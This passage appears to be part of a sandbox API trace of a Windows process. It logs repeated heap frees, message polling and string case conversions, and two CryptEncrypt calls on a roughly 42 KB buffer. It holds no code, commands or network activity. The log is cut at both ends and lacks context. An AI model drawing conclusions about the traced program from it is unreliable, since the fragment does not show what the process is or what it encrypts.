hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.127] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.127] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.127] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.127] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.127] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d6e70 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.131] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xa6ab, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xa6b0) returned 1 [0257.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.132] CharLowerBuffW (in: lpsz="byte[42672]", cchLength=0xb | out: lpsz="byte[42672]") returned 0xb [0257.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.133] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.133] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.133] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.133] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.133] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.133] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.134] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.134] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24d6e70*, pdwDataLen=0x8bef68*=0xa6ab, dwBufLen=0xa6b0 | out: pbData=0x24d6e70*, pdwDataLen=0x8bef68*=0xa6b0) returned 1 [0257.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.143] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.143] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.143] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.143] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.143] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.143] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.143] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.144] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.144] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.144] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.144] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.144] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.144] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.144] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.144] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.144] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.147] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.147] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.147] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.154] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.154] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0257.154] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.154] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0257.154] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.154] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.154] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.154] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.154] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.154] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.154] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.155] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.155] CryptDestroyKey (hKey=0xaa5860) returned 1 [0257.155] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.155] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.155] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.155] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.155] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.155] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.155] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.155] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.155] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.155] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.156] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.156] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.156] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.156] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.156] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.156] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.156] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.156] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.156] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.156] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.156] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.157] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.157] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.157] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.157] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.157] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.157] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.157] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, 